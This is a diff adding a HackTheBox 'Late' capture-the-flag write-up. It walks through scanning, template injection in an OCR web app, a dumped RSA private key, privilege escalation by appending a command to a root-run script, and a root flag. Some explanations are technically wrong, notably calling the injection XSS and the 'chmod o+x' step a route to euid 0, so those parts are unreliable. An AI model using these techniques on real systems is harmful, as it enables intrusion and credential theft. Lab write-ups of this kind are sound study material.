add: writeup-ctf

content/writeup-ctf/writeup-late-htb/index.md

@@ -0,0 +1,146 @@
+---
+title: "Writeup - Late (HTB)"
+date: 2022-04-25
+slug: "writeup-late-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Late](https://app.hackthebox.com/machines/Late) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.129.45.153
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (nginx 1.14.0)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First of all, let's start with the enumeration of the site's files.
+
+![](img/image-3.webp)
+
+![](img/image-4.webp)
+
+After some research in the results nothing very interesting in this site. So I scan the subdomains.
+
+![](img/image-5.webp)
+
+I find the `images` subdomain. I add it in the `/etc/hosts` file, then I go to the site.
+
+![](img/image-6.webp)
+
+It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing?
+
+After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server:
+
+![](img/image-7.webp)
+
+Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used:
+
+- 777777 -> Jinja2
+- 49 -> Twig
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Downloads]
+└─$ cat results.txt 
+<p>7777777
+</p>
+```
+After retrieving the result file we find the answer `7777777`. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2) to see the possibilities.
+
+I first try to send the following image:
+
+![](img/image-8.webp)
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Downloads]
+└─$ cat results.txt 
+<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)
+
+</p>
+```
+In the result file I find the expected result, the web application is executed as `svc_acc`. I now try to see if this user has an RSA key that would allow me to connect via SSH:
+
+![](img/image-9.webp)
+
+
+```bash
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM
+HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO
+bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi
+/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7
+d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7
+7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM
+fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0
+ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz
+W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ
+uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC
+T9KJxoUhuoCuMs00PxtJMymaHvOkDYSXOyHHHPSlIJl2ZezXZMFswHhnWGuNe9IH
+Ql49ezkCgYEA0OTVbOT/EivAuu+QPaLvC0N8GEtn7uOPu9j1HjAvuOhom6K4troi
+WEBJ3pvIsrUlLd9J3cY7ciRxnbanN/Qt9rHDu9Mc+W5DQAQGPWFxk4bM7Zxnb7Ng
+Hr4+hcK+SYNn5fCX5qjmzE6c/5+sbQ20jhl20kxVT26MvoAB9+I1ku8CgYEA0EA7
+t4UB/PaoU0+kz1dNDEyNamSe5mXh/Hc/mX9cj5cQFABN9lBTcmfZ5R6I0ifXpZuq
+0xEKNYA3HS5qvOI3dHj6O4JZBDUzCgZFmlI5fslxLtl57WnlwSCGHLdP/knKxHIE
+uJBIk0KSZBeT8F7IfUukZjCYO0y4HtDP3DUqE18CgYBgI5EeRt4lrMFMx4io9V3y
+3yIzxDCXP2AdYiKdvCuafEv4pRFB97RqzVux+hyKMthjnkpOqTcetysbHL8k/1pQ
+GUwuG2FQYrDMu41rnnc5IGccTElGnVV1kLURtqkBCFs+9lXSsJVYHi4fb4tZvV8F
+ry6CZuM0ZXqdCijdvtxNPQKBgQC7F1oPEAGvP/INltncJPRlfkj2MpvHJfUXGhMb
+Vh7UKcUaEwP3rEar270YaIxHMeA9OlMH+KERW7UoFFF0jE+B5kX5PKu4agsGkIfr
+kr9wto1mp58wuhjdntid59qH+8edIUo4ffeVxRM7tSsFokHAvzpdTH8Xl1864CI+
+Fc1NRQKBgQDNiTT446GIijU7XiJEwhOec2m4ykdnrSVb45Y6HKD9VS6vGeOF1oAL
+K6+2ZlpmytN3RiR9UDJ4kjMjhJAiC7RBetZOor6CBKg20XA1oXS7o1eOdyc/jSk0
+kxruFUgLHh7nEx/5/0r8gmcoCvFn98wvUPSNrgDJ25mnwYI0zzDrEw==
+-----END RSA PRIVATE KEY-----
+```
+Now that I have the RSA key in my possession, I can connect in SSH and get the first flag :
+
+![](img/image-10.webp)
+
+## Privilege escalation
+
+To start I run the [linpeas.sh](https://linpeas.sh) script to get an idea of what is present on the machine. Quickly I find a script `ssh-alert.sh` which is a script belonging to my user, but which is executed by root.
+
+![](img/image-11.webp)
+
+I look at its contents and find that it is a script that generates an alert by mail for each session opened via SSH.
+
+![](img/image-12.webp)
+
+Knowing that I can modify it, I add the following line at the end of the file.
+
+
+```bash
+echo "chmod o+x /bin/bash" >> ssh-alert.sh
+```
+This allows to add to the file a `euid = 0`, which will allow me to execute the script as root. This is the same principle that is used with the su command. I quit the ssh session, I restart it, then I create a bash session with the following command :
+
+![](img/image-13.webp)
+
+I am now root of the machine and I can recover the last flag.
+
+
+```bash
+bash-4.4# cat /root/root.txt 
+0abb3c1b4d046ab54e80851cf85c6448
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the image converter to avoid XSS
+- Launch web applications with a user with minimum rights and no RSA key
+- Do not let a user-modifiable script be executed by root